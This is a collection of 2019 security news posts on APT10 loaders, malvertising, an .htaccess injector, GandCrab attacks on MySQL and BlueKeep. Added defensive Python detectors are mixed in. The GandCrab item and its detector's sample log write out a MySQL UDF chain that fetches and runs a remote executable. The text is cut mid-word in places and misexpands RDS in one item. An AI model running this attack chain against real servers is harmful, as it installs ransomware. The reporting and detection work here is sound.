  • jjs.exe – legitimate executable, a JVM-based implementation of a JavaScript engine that is part of the Java platform, abused as a loader for the malware.
  • jli.dll – malicious DLL
  • msvcrt100.dll – legitimate Microsoft C Runtime DLL
  • svchost.bin – binary file

Both variants served several final payloads, including the PlugX and Quasar remote access trojan (RAT).


The loaders implement DLL side-loading: they start by running a legitimate executable, which is abused to load a malicious DLL.

Both loaders use the jli.dll library, which maps the data file svchost.bin into memory and decrypts it to retrieve shellcode that is injected into svchost.exe and contains the actual malicious payload.

The two loaders differ in the way they ensure persistence: the first uses a service as its persistence method, while the second leverages the Run registry key for the current user under the name “Windows Updata”.
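The side-loading pattern above (a legitimate, signed jjs.exe dropped into an attacker-chosen directory next to a malicious jli.dll) is visible in image-load telemetry. The following is an added example for this page, not code from enSilo or the Security Affairs post, that applies two heuristics to Sysmon Event ID 7 records: a DLL belonging to a known product loaded from outside that product's install tree, and an unsigned DLL loaded from the process's own directory when that directory lies outside the trusted program roots. The expected-location table, the trusted roots, the `C:\ProgramData\Adobe` drop directory, the JDK path and the event records are all constructed assumptions for the example; only the file names jjs.exe, jli.dll and msvcrt100.dll come from the report.

```python
r"""Flag DLL side-loading from Sysmon Event ID 7 (ImageLoad) records.

Two heuristics, both assumptions of this example rather than rules from the
enSilo report: (1) a DLL that belongs to a known product is loaded from outside
that product's install tree; (2) an unsigned DLL is loaded from the process's
own directory when that directory is outside the trusted program roots.
"""
import ntpath

# DLL name -> path fragments its legitimate copy is expected under (assumed table;
# extend it with the DLLs your own estate knows to be side-load targets).
EXPECTED_LOCATIONS = {
    "jli.dll": ("\\java\\", "\\jdk", "\\jre"),
}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed Event ID 7 field subsets (Image, ImageLoaded, Signed, as Sysmon
# emits them). The JDK path and the C:\ProgramData\Adobe drop location are assumptions.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Java\jdk1.8.0_201\bin\jjs.exe",
     "ImageLoaded": r"C:\Program Files\Java\jdk1.8.0_201\bin\jli.dll", "Signed": "true"},
    {"Image": r"C:\ProgramData\Adobe\jjs.exe",
     "ImageLoaded": r"C:\ProgramData\Adobe\jli.dll", "Signed": "false"},
    {"Image": r"C:\ProgramData\Adobe\jjs.exe",
     "ImageLoaded": r"C:\ProgramData\Adobe\msvcrt100.dll", "Signed": "true"},
]


def analyze_image_loads(events):
    """Return one alert per suspicious load, listing every heuristic it tripped."""
    alerts = []
    for ev in events:
        image, dll = ev["Image"], ev["ImageLoaded"]
        dll_l = dll.lower()
        name = ntpath.basename(dll_l)
        signed = str(ev.get("Signed", "false")).lower() == "true"
        reasons = []

        # (1) product DLL loaded from a directory the product does not install into
        expected = EXPECTED_LOCATIONS.get(name)
        if expected and not any(frag in dll_l for frag in expected):
            reasons.append(f"{name} loaded from outside its product directory")

        # (2) unsigned DLL beside the executable, outside Program Files / Windows
        same_dir = ntpath.dirname(dll_l) == ntpath.dirname(image.lower())
        if same_dir and not signed and not dll_l.startswith(TRUSTED_ROOTS):
            reasons.append("unsigned DLL loaded from the process's own directory outside trusted roots")

        if reasons:
            alerts.append({"process": image, "dll": dll, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze_image_loads(SAMPLE_EVENTS):
        print(alert)
```

The signed msvcrt100.dll sitting in the same attacker directory produces no alert on its own, which is the intended behaviour: redistributable runtime DLLs legitimately travel with applications, and it is the unsigned jli.dll next to a Java binary that has no business being there that carries the signal.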

“It goes a long way to completely remove any sign of McAfee's email proxy service from the infected machine,” Hunter said. “Besides killing the process, it also makes sure to delete any related keys in the registry, and recursively deletes any related files and directories on the machine. The same behavior was observed in the paranoid variant as part of a VBScript the dropper runs.”

Experts noticed that the payloads used by the attackers in the latest campaigns are still in a development phase.

“Both variants of the loader implement the same decryption and injection mechanism,” conclude the experts.

Further technical details, including IoCs, are reported in the analysis published by enSilo.


Pierluigi Paganini

(SecurityAffairs – APT10, hacking)

The post APT10 is back with two new loaders and new versions of known payloads appeared first on Security Affairs.

Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising

Remember the malvertising campaigns of the early days, with adverts telling you that you are the nth visitor to a website and have a prize to claim? These days there is little chance of seeing a Flash-based animated advert like that, since Google Chrome blocks scam-like adverts by default as part of the Google Safe Browsing initiative, which the Firefox browser also uses. The demise of malvertising through adverts does not end with the anemic Flash-based variants, though, as cybercriminals are now using Bitcoin (or rather people's desire for it) to lure people to dodgy websites they control.

Imagine that a malvertising website offers its visitors $30 worth of Bitcoin: not huge, but with enough “visits” it could buy someone some stuff on eBay or an Amazon gift card. However, the website installs keyloggers, banking trojans or ransomware that harm the victim at a later time. Another similar but unrelated set of websites offers referral prizes in Ethereum (another cryptocurrency, an alternative to Bitcoin), with one website claiming that users who refer 1,000 visitors to it will earn $750 worth of Ethereum.

Both websites offer a download they call “Bitcoin Collector” which claims to be an easy mining program for Windows, which will provide “free Bitcoins” for the user, but instead caused the computer to mine cryptocurrency instead for the author at the expense of the user. One of the most common trojan horse of this category is one named BotCollector.exe, often comes from a .zip file downloaded from a malvertising website.

“When you execute the included BotCollector.exe, it will launch a program called ‘ – Bot’ that does not appear to do much. In reality, though, this is a Trojan that pretends to be a bitcoin generator but simply launches a malware payload. It does this by copying a file at geobaze\patch\logo.png to logo.exe and executing it (planting itself deep into the Windows operating system)”, explained Lawrence Abrams of

BotCollector.exe was previously observed to carry a different behavior, it used to be the main payload for the ransomware named “Marozka Tear”. Being unsophisticated ransomware, Marozka Tear’s author used a public free Gmail account ( in order for its victim to contact him/her for the payment of the ransom instead of having a sophisticated “shopping cart” for collecting payments. The Bleepingcomputer team stopped the ransomware from being profitable with their release of a free decryptor program that reverses the encryption of user files without paying Marozka Tear’s author.

At the time of this writing, the two hidden payloads of the new variant of BotCollector that have not yet fully dissected by the BleepingComputer team. But initial checks show it can be compared to a full-blown espionage-type of malware that can record keystrokes, take screenshots, capture browser history, sends any user files to its author and even the capability to copy the information of a crypto wallet.

The post Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising appeared first on .

Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects

Security researchers are monitoring a new hacking campaign aimed at Joomla and WordPress websites, in which attackers use an .htaccess injector for malicious redirects.

Researchers at Sucuri are warning admins of Joomla and WordPress websites about a malicious hypertext access (.htaccess) injector found on a client website. The website was used by attackers to redirect traffic to advertising sites that attempted to deliver malware.

“During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website. ” reads the report.

.htaccess files are configuration files for web servers running the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features. The features include the redirect functionality, content password protection or image hot link prevention.

Sucuri spotted threat actors abusing the URL redirect function of the .htaccess file to redirect visitors of compromised websites to phishing sites, sites delivering malware, or simply to generate impressions.

At this time it is not clear how the attackers gained access to the Joomla and WordPress websites; we only know that they injected the malicious code into some of the websites’ index.php files.

“Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

htaccess redirect

“This code is searching for an .htaccess file. If found, this code will place malicious redirects in the file immediately after “# BEGIN WORDPRESS”.” continues the report.

A warning message from endpoint antivirus software when users try to visit malicious site redirected by Joomla and WordPress sites.

This PHP code also searches for further files and folders, recursing into nested directories.

It’s not uncommon to see hackers targeting websites through the .htaccess file. For example, in October 2018 a security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, in versions of the jQuery File Upload plugin dating back to 2010. Attackers exploited the issue to carry out several malicious activities, including defacement, exfiltration, and malware infection.
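The defender’s counterpart to the injector described above is a scanner that walks the document root the same way the malicious code does. The following Python script is an added example, not Sucuri’s code or anything from the report: it recurses through a site tree, reads every .htaccess it finds, and reports redirect directives (RewriteRule, Redirect, RedirectMatch and friends) whose target host is not one of the site’s own. Both .htaccess contents, the temporary directory layout and the host names are constructed; the injected sample mirrors the report’s description of a redirect block placed immediately after “# BEGIN WordPress”.

```python
import os
import re
import tempfile
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Constructed .htaccess samples (not Sucuri's actual injected code). The second one
# carries a redirect block inserted right after "# BEGIN WordPress", as the report describes.
CLEAN_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

INJECTED_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://ads.example.invalid/landing [R=301,L]
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Directives that can send a visitor elsewhere, and the absolute URLs they carry.
REDIRECT_DIRECTIVE = re.compile(r"^\s*(?:RewriteRule|Redirect(?:Match|Permanent|Temp)?)\s+", re.I)
ABSOLUTE_URL = re.compile(r"https?://[^\s\]]+", re.I)


def external_redirects(text: str, site_hosts: Set[str]) -> List[Tuple[int, str]]:
    """(line number, URL) for every redirect directive whose target host is not ours."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not REDIRECT_DIRECTIVE.match(line):
            continue
        for url in ABSOLUTE_URL.findall(line):
            if (urlparse(url).hostname or "").lower() not in site_hosts:
                hits.append((lineno, url))
    return hits


def scan_tree(root: str, site_hosts: Set[str]) -> Dict[str, List[Tuple[int, str]]]:
    """Walk the document root, nested folders included, and report every .htaccess
    that redirects off-site. Keys are root-relative paths with forward slashes."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = external_redirects(fh.read(), site_hosts)
        if hits:
            report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def demo() -> Dict[str, List[Tuple[int, str]]]:
    """Build a throwaway site tree with one clean and one injected .htaccess, then scan it."""
    root = tempfile.mkdtemp(prefix="htaccess_scan_")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    with open(os.path.join(root, ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_HTACCESS)
    with open(os.path.join(root, "wp-content", "uploads", ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write(INJECTED_HTACCESS)
    return scan_tree(root, {"www.example.com"})


if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, url in hits:
            print(f"{path}:{lineno}: off-site redirect to {url}")
```

Run against a real site, call scan_tree with the document root and the set of hostnames the site legitimately answers on; a redirect to any other host in any .htaccess, especially one sitting under wp-content/uploads or a module directory, is worth an incident ticket rather than a silent cleanup, since the injector that planted it is usually still present in an index.php nearby.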

alled jQuery File Upload placed 7,800 different software applications at potential risk for compromise and remote code-execution.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a directory) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

“While the majority of web applications make use of redirects, these features are also commonly used by bad actors to generate advertising impressions, send unsuspecting site visitors to phishing sites, or other malicious web pages.” concludes Sucuri.

Pierluigi Paganini

(SecurityAffairs – .htaccess, hacking)

The post Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects appeared first on Security Affairs.

CVE-2019-11815: Experts discovered a privilege escalation vulnerability in the Linux Kernel

Red Hat engineers and experts discovered a memory corruption vulnerability in the Linux kernel, a flaw in the implementation of RDS (Remote desktop Protocol) over TCP. The flaw affects Red Hat, Ubuntu, Debian and SUSE, and security advisories have been issued for all of them. This flaw could enable an…

Sectigo says that most of certificates reported by Chronicle analysis were already revoked

According to Sectigo, most of the certificates used to sign the malware submitted to VirusTotal and issued by the company were expired and were already revoked.

This week experts at Chronicle published a study on signed malware registered on VirusTotal that states that most of the digital certificates used to sign malware samples found on VirusTotal in 2018 have been issued by the Certificate Authority (CA) Comodo CA (aka Sectigo).

Chronicle’s security researchers analyzed submissions between May 7, 2018 and May 7, 2019, discovering that out of a total of 3,815 signed malware samples, 1,775 were signed using a digital certificate issued by Comodo RSA Code Signing CA.


Experts from Sectigo analyzed Chronicle’s findings and provided their response. According to Sectigo, most of the certificates used to sign the malware submitted to VirusTotal and issued by the company were expired or had already been revoked. The CA also states that many of the certificates analyzed by Chronicle were duplicates; only 127 of them were active, and those have now been revoked by the company. Duplicates are certificates that match others already logged in a different category; they can result from multiple uses of the same certificate or from multiple reports of the same malware application.

Below is the breakdown provided by Sectigo:

  • Duplicate: 1660
  • Expired: 70
  • Previously revoked: 126
  • In process: 25
  • Active (now revoked): 127

“Unfortunately, recent press reports suggest the incorrect conclusion that Chronicle reported nearly 2000 such certificates for Comodo / Sectigo. Since this story ran, we have investigated all of the certificates attributed to Comodo / Sectigo. More than 90% of these were expired, previously revoked, or duplicate reports.” reads the post published by Sectigo.

The CA confirmed that it is still investigating the 25 certificates labeled with the “in process” status.

“These reported certificates did not match our records of Code Signing certificates from Comodo / Sectigo during our investigation. We are continuing to investigate these certificates.” reads the CA.

Sectigo encourages Chronicle or other researchers to report any misuse of its public certificates at:

Pierluigi Paganini

(SecurityAffairs – digital certificates, CA)

The post Sectigo says that most of certificates reported by Chronicle analysis were already revoked appeared first on Security Affairs.

Security Affairs newsletter Round 215 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Dutch intelligence investigate alleged Huawei ‘backdoor’
Salesforce faced one of its biggest service disruptions ever
Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk
Amnesty International filed a lawsuit against Israeli surveillance firm NSO
Chronicle experts spotted a Linux variant of the Winnti backdoor
Data belonging to Instagram influencers and celebrities exposed online
Defiant Tech firm who operated LeakedSource pleads guilty
Google will block Huawei from using Android and its services
Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS
After latest Microsoft Windows updates some PCs running Sophos AV don’t boot
Emsisoft released a free Decrypter for JSWorm 2.0
Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones
MuddyWater BlackWater campaign used new anti-detection techniques
US Commerce Department delays Huawei ban for 90 Days
ActiveX Controls in South Korean websites are affected by critical flaws
Emsisoft released a free Decrypter for the GetCrypt ransomware
G Suite users passwords stored in plain-text for more than 14 years
SandboxEscaper is back with a new Windows Zero-Day in Task Scheduler
The Satan Ransomware adds new exploits to its arsenal
Anonymous and LulzSec target the Italian Police and doctors
Playing Cat and Mouse: Three Techniques Abused to Avoid Detection
PoC Exploits for CVE-2019-0708 wormable Windows flaw released online
SandboxEscaper disclosed 3 Microsoft zero-day flaws in 24 hours
Tor Browser for Android is available through the Play Store
UK provided evidence to 16 NATO allies of Russia hacking campaigns
Chronicle’s study reveals CAs that issued most certificates to sign malware samples on VirusTotal
Facebook says it took down 2.19 billion accounts in Q1 2019
How Hackers Access Direct Deposit Paycheck — And What to Do About It
US DoJ’s superseding indictment charges Assange with violating Espionage Act
0patch issued a micropatch to address the BlueKeep flaw in always-on servers
GitHub introduces new tools and security features to secure code
Hackers target MySQL databases to deliver the GandCrab ransomware
Snapchat staff used internal tools to spy on users

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 215 – News of the week appeared first on Security Affairs.

Hackers target MySQL databases to deliver the GandCrab ransomware

Security experts at Sophos have detected a wave of attacks targeting Windows servers running MySQL databases with the intent of delivering the GandCrab ransomware.

Sophos researchers have observed a wave of attacks targeting Windows servers that run MySQL databases, in which threat actors aim to deliver the GandCrab ransomware.

This is the first time the company has seen hackers targeting Windows servers running MySQL database instances in order to infect them with ransomware.

The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the “set” command to load all the bytes composing the helper DLL into a session variable in memory, and writes the contents of that variable out to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server’s plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:


The command to invoke the xpdl3 function is:

select xpdl3('hxxp://[.]exe','c:\\isetup.exe') 

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.
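The chain described above (a hex blob staged in a session variable, a table dumped into the plugin directory, a UDF created with SONAME, then a call that fetches a remote executable) leaves a distinctive sequence in MySQL’s general query log. The following Python detector is an added example, not Sophos’ code: it groups queries by connection thread and flags any session that completes at least three of those stages. The log excerpt is constructed to mirror the steps in the article; its timestamps, IP addresses, hex bytes and DLL name are placeholders, and the line layout assumes the general_log file format (timestamp, thread id, command, argument).

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed MySQL general-log excerpt modeled on the attack chain described above.
# Thread 12 is the attacker session; thread 13 is ordinary application traffic.
# The hex literal, IP addresses and DLL name are placeholders, not real IoCs.
SAMPLE_GENERAL_LOG = r"""
2019-05-19T12:00:01.000000Z   12 Connect   root@203.0.113.5 on  using TCP/IP
2019-05-19T12:00:01.100000Z   12 Query     select @@version_compile_os
2019-05-19T12:00:01.200000Z   12 Query     set @a = concat('', 0x4d5a90000300000004000000ffff0000b8000000)
2019-05-19T12:00:01.300000Z   12 Query     create table yongger2(data longblob)
2019-05-19T12:00:01.400000Z   12 Query     insert into yongger2 values (@a)
2019-05-19T12:00:01.500000Z   12 Query     select data from yongger2 into dumpfile 'C:\Program Files\MySQL\lib\plugin\udf_placeholder.dll'
2019-05-19T12:00:01.600000Z   12 Query     drop table yongger2
2019-05-19T12:00:01.700000Z   12 Query     drop function if exists xpdl3
2019-05-19T12:00:01.800000Z   12 Query     create function xpdl3 returns string soname 'udf_placeholder.dll'
2019-05-19T12:00:01.900000Z   12 Query     select xpdl3('http://198.51.100.7/3306-1.exe','c:\isetup.exe')
2019-05-19T12:05:00.000000Z   13 Query     select id, name from customers where id = 42
"""

# general_log line: <timestamp> <thread id> <command> <argument>
LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")

# Each stage of the chain as a (name, pattern) pair matched against the query text.
STAGES = [
    ("hex_blob_in_variable",
     re.compile(r"\bset\s+@\w+\s*=.*0x[0-9a-f]{32,}", re.I)),
    ("write_to_plugin_dir",
     re.compile(r"\binto\s+(?:dumpfile|outfile)\s+'[^']*plugin[^']*'", re.I)),
    ("udf_from_shared_library",
     re.compile(r"\bcreate\s+function\s+\w+\s+returns\s+\w+\s+soname\b", re.I)),
    ("udf_called_with_remote_url",
     re.compile(r"\bselect\s+\w+\s*\(\s*'https?://", re.I)),
]


def stages_per_thread(log_text: str) -> Dict[int, List[str]]:
    """For every connection thread id, the ordered list of distinct chain stages seen."""
    seen: Dict[int, List[str]] = defaultdict(list)
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if not m or m.group(3).lower() != "query":
            continue
        tid, query = int(m.group(2)), m.group(4)
        for name, pattern in STAGES:
            if pattern.search(query) and name not in seen[tid]:
                seen[tid].append(name)
    return dict(seen)


def flagged_threads(log_text: str, min_stages: int = 3) -> List[int]:
    """Thread ids that completed at least min_stages distinct stages of the chain."""
    return sorted(tid for tid, s in stages_per_thread(log_text).items() if len(s) >= min_stages)


if __name__ == "__main__":
    for tid in flagged_threads(SAMPLE_GENERAL_LOG):
        print(f"thread {tid}: {' -> '.join(stages_per_thread(SAMPLE_GENERAL_LOG)[tid])}")
```

The stage list is deliberately generic (no table or function names from this campaign), so a renamed helper table or UDF still trips it; the per-thread grouping matters because each stage on its own is legitimate administration, and only the sequence inside one session is the signal. The general log has to be enabled for this to work, and on a busy server a cheaper option is to watch the plugin directory for new files and the mysql.func table for new rows.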

According to Sophos, at least one Chinese threat actor is currently carrying out this kind of attack, scanning the internet for Windows servers that are running MySQL databases.

“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.

“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.

The GandCrab sample that targeted the honeypot was downloaded more than 500 times. Unfortunately, that sample was not the only one: counted together, the experts estimated nearly 800 downloads in five days, plus more than 2,300 downloads of the other GandCrab sample in the open directory.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.

“Counted together, there have been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.”

The researchers pointed out that this isn’t a massive or widespread attack; nevertheless, it represents a serious risk to MySQL server admins who have exposed their installations online.

Pierluigi Paganini

(SecurityAffairs – MySQL databases, GandCrab)

The post Hackers target MySQL databases to deliver the GandCrab ransomware appeared first on Security Affairs.

Banking Trojan Infections Dominated In Q1 2019

Kaspersky Lab, the research arm of antivirus vendor Kaspersky, has revealed that the first quarter of 2019 saw banking trojan cases double globally compared to the last quarter of 2018. Cybercriminals switched their focus to banking trojans after the shutdown of the very popular Coinhive cryptojacking service in March 2019. With the focus on profit, ransomware infections are slowly declining, while operating system mitigations are reducing the infection vectors available to cryptocurrency malware.

“In Q1 2019, Kaspersky Lab detected a 58% increase in modifications of banking Trojan families, used in attacks on 312,235 unique users. Banking Trojans grew not only in the number of different samples detected, but their share of the threat landscape increased as well. In Q4 2018, mobile banking Trojans accounted for 1.85% of all mobile malware; in Q1 2019, their share reached 3.24%,” explained Victor Chebyshev, Kaspersky’s Lead of Research Development team.

Banking trojans of 2019 are highly modular, with new features added on-the-fly by their respective authors. Kaspersky detected that for the first quarter of 2019 alone, 29,841 variants of banking trojans were discovered. That is a sizable increase from just 18,501 discovered variants in the 4th quarter of 2018.

“As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected,” added Chebyshev.

Kaspersky expects the mobile platform to be the segment hit hardest, because users today perform more of their computing on mobile devices than on a full-fledged computer.

“The rapid rise of mobile financial malware is a troubling sign, especially since we see how criminals are perfecting their distribution mechanisms. For example, a recent tendency is to hide the banking Trojan in a dropper – the shell that is supposed to fly to the device under the security radar, releasing the malicious part only upon arrival,” concluded Chebyshev.

The post Banking Trojan Infections Dominated In Q1 2019 appeared first on .

Cyber News Rundown: Banking Trojan Closes Ohio Schools

Banking Trojan Shuts Down Ohio School District

After the discovery of the banking Trojan known as Trickbot, an Ohio school district was forced to cancel school since they were unable to fully disinfect the networks before classes resumed the following Monday. Preliminary reports have concluded that no students were responsible for the attack, as it appears to have started its data-gathering on a computer belonging to the district treasurer’s office. In order for classes to resume normally, the IT staff for the district had to re-format nearly 1,000 affected computers. 

GetCrypt Spreading Through RIG Exploit Kits

Another ransomware variant, GetCrypt, has been spotted in the wild that spreads itself across systems by redirecting visitors to a compromised website to a separate page hosting an exploit kit. After checking for several Eastern European languages, the ransomware begins encrypting all files on the system and displays a standard ransom note. In addition to removing all available shadow copies from the computer, GetCrypt also appends all encrypted files with a randomized, four-character string based on the CPUID of the device itself.

Google Assistant Logs All Online Purchases

It was recently discovered that Google’s Assistant, released last year, keeps a log of all online purchases for which a receipt was sent to the user’s Gmail account. The “Payments” page on a user’s Google account shows transactions, flight and hotel reservations, and other purchases made up to several years prior, even showing the cost, date, and time of the purchase.

Forbes Joins List of Magecart Victims

It was revealed late last week that Forbes had fallen victim to a Magecart attack possibly affecting anyone who made a purchase on the site during that time. Fortunately, the researcher who discovered the attack quickly notified both Forbes and the domain owner, resulting in a swift removal of the malicious payment card skimmer from the highly-trafficked site. It’s likely that Forbes became a victim after another vendor in their supply chain was compromised.

Australian IT Contractor Arrested for Cryptomining

An IT contractor working in Australia was arrested after being caught running cryptomining software on government-owned computers, which netted him over $9,000 in cryptocurrency. The charges encompass misuse of government systems by making modifications to critical functions and security measures for personal gain while in a position of trust. By making these changes, this contractor could have exposed a much larger portion of the network to malicious actors who take advantage of misconfigured settings to access company data.

The post Cyber News Rundown: Banking Trojan Closes Ohio Schools appeared first on Webroot Blog.

Chronicle’s study reveals CAs that issued most certificates to sign malware samples on VirusTotal

Most of the digital certificates used to sign malware samples found on VirusTotal have been issued by the Certificate Authority (CA) Comodo CA.

Most of the digital certificates used to sign malware samples found on VirusTotal in 2018 have been issued by the Certificate Authority (CA) Comodo CA (aka Sectigo).

Chronicle’s security researchers analyzed submissions between May 7, 2018 and May 7, 2019, discovering that out of a total of 3,815 signed malware samples, 1,775 were signed using a digital certificate issued by Comodo RSA Code Signing CA.

Virus writers (vxers) sign their malware to evade detection by some security systems.

Malware authors take advantage of this inherited trust model by purchasing certificates directly or via resellers; their signed code is considered reliable until the CA revokes the certificate.

At the moment, the researchers note, the only real tool to combat certificate abuse is the revocation of that certificate, a process through which the CA says the certificate is no longer trustworthy, and which introduces a delay in which the signed malware may be considered “trusted”.

“The chain of trust is relatively straight-forward: certificates are signed (issued) by trusted certificate authorities (CAs), which have the backing of a trusted parent CA.” reads the study published by Chronicle. “This inherited trust model is taken advantage of by malware authors who purchase certificates directly or via resellers. Whether purchased directly or indirectly, due diligence into customers appears to be lacking.”

The investigation conducted by Chronicle experts focused on signed Windows PE Executable files uploaded to VirusTotal. The researchers filtered out a large number of samples, all the samples with less than 15 aggregate detections were excluded along with grayware files.

Chronicle calculated the distinct number of samples signed with digital certificates issued by each CA.

Comodo issued the largest number of signed samples, at 1,775, with Thawte at 509, VeriSign at 261, Sectigo (formerly Comodo) at 182, Symantec at 131, and DigiCert at 118.

“CAs who signed certificates of 100 or more malware samples account for nearly 78% of signed samples uploaded to VirusTotal.” continues Chronicle.

digital certificates signed malware

Experts explained that at the time of the analysis (May 8th, 2019), 21% of the samples had their certificates revoked, which confirms that CAs are taking some action to counter the abuse. Note that a revocation is reflected in the VirusTotal dataset only after the signed sample has been rescanned following the revocation by the responsible CA.

“While malware abusing trust is not a new phenomenon, the popular trend of financially motivated threat actors buying code signing certificates illuminates the inherent flaws of trust based security. Signed payloads are no longer solely within the domain of nation-state threat actors stealing code signing certificates from victims; they are readily accessible to operators of crime focused malware.” conclude the experts. “The impact is amplified by the scope and scale of typical crimeware campaigns. Expect to see signed malware reported more frequently.”

Pierluigi Paganini

(SecurityAffairs – malware, digital certificates)

The post Chronicle’s study reveals CAs that issued most certificates to sign malware samples on VirusTotal appeared first on Security Affairs.

PoC Exploits for CVE-2019-0708 wormable Windows flaw released online

Several security experts have developed PoC exploits for the wormable Windows RDS flaw tracked as CVE-2019-0708 and dubbed BlueKeep.

Experts have developed several proof-of-concept (PoC) exploits for the recently patched Windows Remote Desktop Services (RDS) vulnerability tracked as CVE-2019-0708 and dubbed BlueKeep.

One of the PoC exploits could be used for remote code execution on vulnerable systems.

Microsoft’s Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attacks.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker who connects to the targeted system via RDP and sends specially crafted requests.

As explained by Microsoft, the vulnerability could be exploited by malware with wormable capabilities: it requires no user interaction, making it possible for malware to spread uncontrolled across target networks.

The vulnerability doesn’t affect Windows 8 and Windows 10, but earlier versions are exposed to attack.

Microsoft also advised Windows Server users to block TCP port 3389 and enable Network Level Authentication to prevent any unauthenticated attacker from exploiting this vulnerability.

The issue poses a serious risk to organizations and industrial environments due to the presence of a large number of systems that could be reached via RDS.

Not all the publicly released exploits are fully working; some of them trigger the vulnerability without causing any damage.

Experts at the SANS Institute observed two partial exploits that are publicly available.

“Several security vendors stated publicly that they developed exploits internally that will at least trigger a denial of service condition (blue screen). Currently, there are at least two public partial exploits.” reads the blog post published by the SANS Institute, “One triggers the “vulnerable path” without triggering a blue screen or causing any other damage. It can be adjusted to play with the “channel” parameter to create normal and exploit traffic. The second one also triggers the vulnerability without any intended ill effect. The second exploit has been made available in the form of a stand-alone vulnerability scanner.”

Anyway, some researchers have created exploits to remotely execute code on vulnerable systems.

CVE-2019-0708 exploit code

Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges.

Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Experts believe that it is just a matter of time before we see threat actors exploiting the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

“BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2019-0708 )

The post PoC Exploits for CVE-2019-0708 wormable Windows flaw released online appeared first on Security Affairs.

One year later: The VPNFilter catastrophe that wasn’t

